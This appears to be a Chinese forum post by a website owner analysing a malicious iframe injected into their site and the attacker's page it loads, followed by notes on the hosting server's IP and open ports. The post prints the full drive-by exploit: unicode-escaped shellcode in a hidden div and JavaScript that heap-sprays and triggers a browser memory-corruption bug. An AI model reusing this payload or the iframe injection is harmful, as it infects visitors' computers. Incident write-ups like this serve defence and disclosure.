bing1227.3322.org恶意的代码被360拦截

a52527459

今天网站突然出现360已经拦截2个木马请求，查看代码 多了以下的恶意代码：

<iframe src= http://bing1227.3322.org:8080/19.htm width=500 height=500></iframe>

这个网页内容是：

<div id=sun style='display:none'> 84NNXX%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDBE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%ud4df%udad3%u8f8c%u8a8f%u8e93%u8f8e%u938f%ucfd2%u87da%u8d85%u8d85%u8c92%u8d8d%u938d%uc5d8%ubdd8YY 悙悙悙悙悙悙悙悙  <BUTTON ID='anhey' ONCLICK='anheywangma();' STYLE='DISPLAY:NONE'></BUTTON> <script language="JavaScript">                                         function code()                                                {                                                                   var div=document.getElementById('sun');                            var decode=div.innerHTML;                                          var x=decode.indexOf('MM');                                        var y=decode.indexOf('NN');                                        var xxcode=decode.substring(x+2,y);                                return xxcode;                                                 }                                                                 function sc()                                                   {                                                                   var div=document.getElementById('sun');                            var decode=div.innerHTML;                                          var x=decode.indexOf('XX');                                        var y=decode.indexOf('YY')                                         var cc=decode.substring(x+2,y);                                    cc=unescape(cc);                                                   return cc;                                                     }                                                                                                                               function anheywangma()                                                  {                                                                   var d=document.createElement('DIV');                               d.addBehavior('#default#userData');                                document.appendChild(d);                                           try{for (i=0;i<10;i++)                                                 {d.setAttribute('s',window);}}                                   catch(e){}                                                         window.status+='';                                                 }                                                              var memory;                                                     var temptest = decodeURI(',sun,0c0c,sun,0c0c');                 var nop=unescape(temptest.replace(/,sun,/g,'%u'));              var SC=sc();                                                    var xcode=code()-SC.length*2;                                   while(nop.length <= xcode) nop+=nop;                               nop=nop.substring(0,xcode - SC.length);                         memory=new Array();                                             for(i=0;i<0x100;i++){memory[i]=nop + SC;}                                                                                       CollectGarbage();                                               document.getElementById('anhey').onclick();                       </script>

这个bing1227.3322.org的IP是：118.126.5.117属于上海市 集思网络 IDC。
或许是被肉鸡了。。然后有人再恶意利用了。。
3322.org是动态域名，也可以作为固定ip服务。。就是免费2J域名了。。

这个服务器
开放了21 8080 3389端口
21 是小型ftp
Quick Easy FTP Server.rar 3.9.3 吧。。
8080是HFS 汉化版，里面有五个文件。。其中就包括这个木马文件


网上搜了搜
http://www.discuz.net/forum.php?mod=viewthread&tid=2020410&extra=page%3D1&page=1
这个有涉及到这个恶意代码。。
看来这个恶意的hfs 发布的网页 已经有六天了。。
上面说是ARP，不过没有解释。。。

3389端口开了，但是无法进入，不知道密码。。FTP也是。。要不一定要关闭这个站！！